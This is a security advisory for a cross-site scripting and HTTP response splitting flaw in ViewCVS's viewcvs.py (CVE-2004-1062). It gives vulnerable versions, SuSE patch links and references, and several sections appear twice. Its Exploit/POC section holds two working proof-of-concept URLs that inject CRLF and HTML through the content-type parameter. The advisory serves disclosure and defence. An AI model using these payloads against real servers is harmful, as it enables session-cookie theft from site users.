ViewCVS Source View Input Validation Vulnerability
BID:12112
Info
ViewCVS Source View Input Validation Vulnerability
| Bugtraq ID: | 12112 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-1062 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2004 12:00AM |
| Updated: | Mar 28 2007 11:03PM |
| Credit: | Discovery is credited to Joxean Koret. |
| Vulnerable: |
ViewVC ViewVC 1.0.3 ViewVC ViewVC 1.0.2 ViewCVS ViewCVS 0.9.2 |
| Not Vulnerable: |
ViewCVS ViewCVS 1.0 -dev |
Discussion
ViewCVS Source View Input Validation Vulnerability
ViewCVS is prone to an input-validation vulnerability.
This issue resides in the script that allows users to view source files (viewcvs.py). The software fails to sufficiently sanitize nput supplied through URI parameters, allowing an attacker to launch cross-site scripting and HTTP-response-splitting attacks.
Exploitation could allow the attacker to steal cookie-based authentications and launch other attacks.
This issue appears similar to BID 9291.
ViewCVS is prone to an input-validation vulnerability.
This issue resides in the script that allows users to view source files (viewcvs.py). The software fails to sufficiently sanitize nput supplied through URI parameters, allowing an attacker to launch cross-site scripting and HTTP-response-splitting attacks.
Exploitation could allow the attacker to steal cookie-based authentications and launch other attacks.
This issue appears similar to BID 9291.
Exploit / POC
ViewCVS Source View Input Validation Vulnerability
The following examples were submitted:
http://www.example.com/cgi-bin/viewcvs/project/source.file?rev=HEAD&content-type=text/html%0d%0a%0d%0a<html><body%20bgcolor="black"><
+font%20size=7%20color=red>XSS%20or%20HTTP%20Response%20Splitting</font></html>
http://www.example.com/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0&content-type=text/html%0d%0aContent-Length:1937%0d%0a%0
+d%0aHi
The following examples were submitted:
http://www.example.com/cgi-bin/viewcvs/project/source.file?rev=HEAD&content-type=text/html%0d%0a%0d%0a<html><body%20bgcolor="black"><
+font%20size=7%20color=red>XSS%20or%20HTTP%20Response%20Splitting</font></html>
http://www.example.com/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0&content-type=text/html%0d%0aContent-Length:1937%0d%0a%0
+d%0aHi
Solution / Fix
ViewCVS Source View Input Validation Vulnerability
Solution:
The issue is reportedly addressed in ViewCVS 1.0-dev. Symantec has not confirmed this.
Please see the references for more information.
ViewCVS ViewCVS 0.9.2
Solution:
The issue is reportedly addressed in ViewCVS 1.0-dev. Symantec has not confirmed this.
Please see the references for more information.
ViewCVS ViewCVS 0.9.2
-
SuSE subversion-viewcvs-0.27.0-211.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/subversion-viewcv s-0.27.0-211.i586.rpm -
SuSE subversion-viewcvs-0.27.0-211.x86_64.rpm
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/subversion-vi ewcvs-0.27.0-211.x86_64.rpm -
SuSE subversion-viewcvs-1.0.0-73.17.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/subversion-viewcv s-1.0.0-73.17.i586.rpm -
SuSE subversion-viewcvs-1.0.0-73.17.x86_64.rpm
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/subversion-vi ewcvs-1.0.0-73.17.x86_64.rpm -
SuSE subversion-viewcvs-1.0.8-2.2.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/subversion-viewcv s-1.0.8-2.2.i586.rpm -
SuSE subversion-viewcvs-1.0.8-2.2.x86_64.rpm
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/subversion-vi ewcvs-1.0.8-2.2.x86_64.rpm
References
ViewCVS Source View Input Validation Vulnerability
References:
References:
- ViewCVS Project Page (ViewCVS)
- Re: [viewvc-users] Update: ViewCVS and ViewVC 'checkout view' content type (C. Michael Pilato)
- Update: ViewCVS and ViewVC 'checkout view' content type fixation issue ( Moritz Naumann)